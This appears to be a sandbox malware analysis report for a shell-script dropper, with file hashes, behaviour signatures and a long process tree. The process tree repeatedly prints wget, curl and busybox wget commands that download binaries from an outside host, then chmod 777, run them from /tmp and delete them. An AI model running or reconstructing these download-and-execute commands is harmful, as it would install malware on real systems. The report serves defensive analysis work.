Analysis
- max time kernel: 95s
- max time network: 98s
- platform: debian-9_mips
- resource: debian9-mipsbe-20240729-en
- resource tags: arch:mips, image:debian9-mipsbe-20240729-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 21/10/2024, 01:37
Static task
static1
Behavioral task
behavioral1
Sample
aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh
-
Size
10KB
-
MD5
b7a267850033267bf2b5b7dcddd0b525
-
SHA1
61a2fbb38abff8595a890118cfbee817ea1557f9
-
SHA256
aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b
-
SHA512
adc6f56adb04ebd6bbbdfaaa2e4ca770c59d4abe79734c66fd76c9dd7545685d863952a03b577850049a0fd637107ae75663742043d531d2fcd1eaf825cf2aac
-
SSDEEP
192:aJpwLnbU9swNa6EWdSWnPj+mBw8WSWnS+mBw8/JpwLnWswNa6I:BUEWdSWnPj+mBw8WSWnS+mBw8C
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Reads runtime system information
File opened for reading: /proc/sys/crypto/fips_enabled (process: curl; the same entry is recorded for each curl invocation)
-
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh1⤵PID:699
-
/bin/rm/bin/rm bins.sh2⤵PID:702
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- System Network Configuration Discovery
PID:709
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:717
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- System Network Configuration Discovery
PID:731
-
-
/bin/chmodchmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- File and Directory Permissions Modification
PID:732
-
-
/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- Executes dropped EXE
PID:733
-
-
/bin/rmrm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:734
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:735
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:781
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- System Network Configuration Discovery
PID:783
-
-
/bin/chmodchmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- Executes dropped EXE
PID:785
-
-
/bin/rmrm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:786
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- System Network Configuration Discovery
PID:787
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:790
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- System Network Configuration Discovery
PID:798
-
-
/bin/chmodchmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:823
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- System Network Configuration Discovery
PID:824
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:830
-
-
/bin/chmodchmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:833
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- System Network Configuration Discovery
PID:834
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:835
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- System Network Configuration Discovery
PID:837
-
-
/bin/chmodchmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:840
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- System Network Configuration Discovery
PID:841
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:842
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- System Network Configuration Discovery
PID:844
-
-
/bin/chmodchmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- Executes dropped EXE
PID:846
-
-
/bin/rmrm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:847
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- System Network Configuration Discovery
PID:848
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:849
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- System Network Configuration Discovery
PID:851
-
-
/bin/chmodchmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:854
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- System Network Configuration Discovery
PID:855
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- System Network Configuration Discovery
PID:858
-
-
/bin/chmodchmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:861
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- System Network Configuration Discovery
PID:862
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- System Network Configuration Discovery
PID:865
-
-
/bin/chmodchmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:869
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- System Network Configuration Discovery
PID:870
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:873
-
-
/bin/chmodchmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:876
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:877
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:880
-
-
/bin/chmodchmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:884
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- System Network Configuration Discovery
PID:885
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:886
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- System Network Configuration Discovery
PID:888
-
-
/bin/chmodchmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:891
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:892
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- System Network Configuration Discovery
PID:895
-
-
/bin/chmodchmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:898
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- System Network Configuration Discovery
PID:899
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- System Network Configuration Discovery
PID:902
-
-
/bin/chmodchmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:906
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- System Network Configuration Discovery
PID:907
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- System Network Configuration Discovery
PID:910
-
-
/bin/chmodchmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:913
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- System Network Configuration Discovery
PID:914
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- System Network Configuration Discovery
PID:917
-
-
/bin/chmodchmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:920
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- System Network Configuration Discovery
PID:921
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:924
-
-
/bin/chmodchmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:927
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- System Network Configuration Discovery
PID:928
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- System Network Configuration Discovery
PID:931
-
-
/bin/chmodchmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:934
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- System Network Configuration Discovery
PID:935
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- System Network Configuration Discovery
PID:938
-
-
/bin/chmodchmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:941
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- System Network Configuration Discovery
PID:942
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- System Network Configuration Discovery
PID:945
-
-
/bin/chmodchmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:948
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:949
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- System Network Configuration Discovery
PID:952
-
-
/bin/chmodchmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:956
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:957
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:960
-
-
/bin/chmodchmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:964
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- System Network Configuration Discovery
PID:965
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- System Network Configuration Discovery
PID:968
-
-
/bin/chmodchmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:971
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- System Network Configuration Discovery
PID:972
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- System Network Configuration Discovery
PID:975
-
-
/bin/chmodchmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:978
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- System Network Configuration Discovery
PID:979
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- System Network Configuration Discovery
PID:982
-
-
/bin/chmodchmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:985
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:986
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- System Network Configuration Discovery
PID:989
-
-
/bin/chmodchmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:992
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- System Network Configuration Discovery
PID:993
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:996
-
-
/bin/chmodchmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- System Network Configuration Discovery
PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- System Network Configuration Discovery
PID:1003
-
-
/bin/chmodchmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
